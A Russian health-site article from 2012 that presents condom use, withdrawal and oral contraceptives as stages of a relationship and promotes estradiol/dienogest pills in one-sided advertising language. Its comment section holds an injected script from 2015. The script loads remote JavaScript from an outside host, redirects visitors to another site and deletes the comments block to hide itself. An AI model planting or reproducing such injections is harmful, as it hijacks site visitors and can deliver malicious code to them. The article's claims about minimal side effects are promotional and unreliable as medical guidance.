Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  О чем говорит ваш метод к...  >>  О чем говорит ваш метод контрацепции
 
Обратная связь
 

О чем говорит ваш метод контрацепции

Размер шрифта
21 марта 2012 17:54
  • google_analytics: false
  • Нравится

Развитие отношений мужчины и женщины можно проследить по способам контрацепции, которые они выбирают? Когда кончается флирт и начинается серьезная игра? 

1

  1. Период презерватива

Самый бурный период – начало отношений. На этом этапе влюбленные скорее всего выберут презерватив, так как еще слишком рано говорить об абсолютном доверии друг к другу. Партнеры еще не до конца друг друга знают, но сексуальное притяжение слишком велико, чтобы ему сопротивляться. 

  1. Период прерванного полового акта

Позднее мужчина признается, что он терпеть не может презерватив: они портят ощущения и периодически рвутся. Он же предложит: а не проще ли совсем без них? Период прерванных половых актов – время неспокойное, особенно для женщины: никаких гарантий и постоянный стресс.

У этой фазы есть несколько вариантов развития:

  • Пара расстается, в том числе из-за сексуальной неудовлетворенности.
  • Рано или поздно женщина беременеет, и, в лучшем случае, – рождается незапланированный ребенок.
  1. Период оральной контрацепции

Переход к противозачаточным таблеткам – новый, стабильный, этап отношений пары, которая готова строить вместе планы на будущее. Речь не только о вдумчивом отношении к собственному будущему и здоровью, но и о чувственной стороне. Не секрет, что беспокойство о нежелательной беременности психологически вредно как мужчинам, так и женщинам, – и уж точно не идет на пользу сексуальному удовлетворению.

Эта проблема идеально решается при использовании оральных контрацептивов. Возможность полностью раскрепоститься и получать от секса удовольствие, а не дополнительную головную боль из-за неопределенности, – вот что получают пары, пробующие в качестве метода контрацепции противозачаточные таблетки.

Научное объяснение

К числу недавних революционных разработок ученых относятся препараты, с компонентами – эстрадиолом и диеногестом – максимально близкими натуральным эстрогену и прогестерону. Дозы гормонов в каждой таблетке подобраны в соответствии с днем цикла. Это означает, что риск неприятных побочных явлений, которых так боялись девушки еще несколько лет назад, сведен к минимуму.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.